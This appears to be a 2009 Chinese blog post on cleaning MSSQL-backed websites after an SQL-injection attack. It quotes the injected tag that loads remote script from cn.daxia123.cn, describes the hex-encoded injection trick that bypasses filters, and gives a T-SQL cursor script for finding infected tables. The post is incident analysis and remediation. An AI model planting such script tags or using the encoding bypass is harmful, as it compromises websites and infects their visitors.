------------------------------------------------------------

网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法与原因

客户站,出现生成不了,被挂马。谈不上解决,只找到原因
现状:
各CMS系统无法生成,但是其它操作正常。生成时一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”
受影响对象:采用MSSQL数据库的网站
症状内容:在多个表当中出现挂马代码,如<Script Src=http://cn.daxia123.cn/cn.js> </Script>
     数据库出现新增表:如kill_kk表,xiaolu表
分析如下:
  kill_kk表为入侵者读取网站根目录的工具,被入侵网站的根目录下所有的文件夹与文件名都保存在此。
  xiaolu表:只有一个字段CMD,二进制位。原因不详。
  多个表中的字段内出现挂马内容,字段多为vchar,字段长度大于100,
被攻击原因如下:
  攻击者将攻击代码用2进制,或10或10进制编译成了类似于这样的代码:0x4445434C415245204054205641524348415228323535292C404 放sql注入的代码不能检测出来,但是sql server 会把这样的代码在解释成原来的样子
这样就绕过了sql防注入代码。
  但是,这个代码仅对能解释它的sql server这样的数据库有效,针对access这样的不能解释它的数据库类型攻击无效。
希望微软尽快发补丁。
临时清除办法:
1、批量查找哪些表被挂马了,这一步对大站多表很有用

declare   @str   varchar(100)  
set   @str='daxia123'  //这地方放你所被挂马的关键字;
    
declare   @s   varchar(8000)  
declare   tb   cursor   local   for  
select   s='if   exists(select   1   from   ['+b.name+']   where   ['+a.name+']   like    % +@str+ %)  
    print   
''所在的表及字段:   ['+b.name+'].['+a.name+']'''  
from   syscolumns   a   join   sysobjects   b   on   a.id=b.id  
where   b.xtype='U'   and   a.status>=0  
    
and   a.xusertype   in(175,239,231,167)  
open   tb  
fetch   next   from   tb   into   @s  
while   @@fetch_status=0  
begin  
    
exec(@s)  
    
fetch   next   from   tb   into   @s  
end  
close   tb  
deallocate   tb


代码执行完,会提示哪些表中招了。
你再去清除相关字段内容。

临时解决办法:
查找所有vchar型且字段长度比较大的字段,尽量改小长度。
再通过判断post值的长度来临时解决

 

posted on 2009-11-23 14:28  钱途无梁  阅读(379)  评论(0编辑  收藏  举报